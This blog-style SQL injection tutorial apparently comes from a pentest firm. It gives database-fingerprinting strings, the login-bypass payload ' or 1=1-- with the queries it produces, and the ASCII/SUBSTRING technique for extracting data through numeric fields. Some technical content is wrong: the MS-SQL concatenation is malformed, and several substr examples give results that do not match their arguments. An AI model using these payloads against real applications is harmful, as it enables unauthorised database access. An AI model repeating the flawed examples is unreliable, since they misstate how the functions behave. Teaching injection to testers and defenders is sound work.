It is worth pointing out yet another time that few filtering Technique can’t protect a vulnerable application against SQL injection. In most of the situation, a SQL vulnerable application implement various input filters but all the filters can be by passed and sql injection can be performed.
Understanding of background query and database type is very important to perform sql injection.

Fingerprinting the Database:-

MySQL: ‘Triad’ ‘square’(Remember the space)
Oracle : ‘Triad’||’square’
MS-SQL: ’Triad’||’’square’
But this is only for the string..What about if you want to inject into the numeric field.
MySQL: CONNECTION_ID( ) – CONNECTION_ID( )
Oracle: BITAND(1, 1) – BITAND(1, 1)
Ms-SQL: @@PACK_RECEIVED-@@PACK_RECEIVED
The common Injection technique people try is ‘or 1=1–
Select * from usertable where username=’pranab’ and password=’tsi’
When people performs ‘ or 1=1–
This cause the application to perform the query
Select * from usertable where username=” or 1=1 — and password=’tsi’
If he knows the user name he can perform pranab’ —
This cause the application to perform the query
select * from usertable where username=’Pranab’ — and password=’tsi’

So basically the attacker can write his query after a single quote in the above example.

Example:-

‘ or 1=1 —

Understand the attack surface is very important. The pen tester should know what is going to happen if the query executes.

Retrieving Data as Number

It is fairly common to find that no string fields within an application is vulnerable to SQL injection, because input containing single quotation is handled properly .But still vulnerability still may exists in numeric field as numeric data need not to be encapsulated inside single quote.

Here we can inject our quires that can retrieve data in numeric form.
We can use two functions mainly.

ASCII..(It returns the ASCII code for the input character)
SUBSTRING.. (It will return substring of its input)
We can use this two functions together to retrieve character form into numeric field..

Example:-

SUBSTRING (‘Pranab’ , 1, 1) returns P
ASCII(‘P’) returns 80..
So
ASCII(SUBSTRING(‘Pranab’, 1,1)) Returns 80
Using these function we can cut a string in a systematic way into its individual character and return each of them separately..

USE OF SUBSTRING:-

SUBSTR (string, start position, [LENGTH])

String is the source string.
“Start position” is the position in the source string where you want to start extracting characters. The first position in the string is always ‘1’, NOT ‘0’, as in many other languages.
Length is optional. It is the number of characters to extract.
If this parameter is omitted, substr will return the entire string.
Notes:

If the start position is specified as “0”, substr treats start position as “1”, that is, as the first position in the string.
If the start position is a positive number, then substr starts from the beginning of the string.
If the start position is a negative number, then substr starts from the end of the string and counts backwards.
If the length is a negative number, then substr will return a NULL value.

Examples:-

  • substr(‘Triad square Infosec Pvt Ltd.’, 13, 7) will return ‘Infosec’
  • substr(‘Triad square Infosec Pvt Ltd.’, 13) will return ‘Infosec Pvt Ltd.’
  • substr(‘Triad square Infosec Pvt Ltd.’, 1, 11) will return ‘Triadsquare’
  • substr(‘Triad square Infosec Pvt Ltd.’, 0, 11) will return ‘Triadsquare’
  • substr(‘Triad square Infosec Pvt Ltd.’, -4, 3) will return ‘Ltd.’
  • substr(‘Triad square Infosec Pvt Ltd.’, -16, 7) will return ‘Infosec’
  • substr(‘Triad square Infosec Pvt Ltd.’, -16, 3) will return ‘Info’

Leave a Reply

Your email address will not be published. Required fields are marked *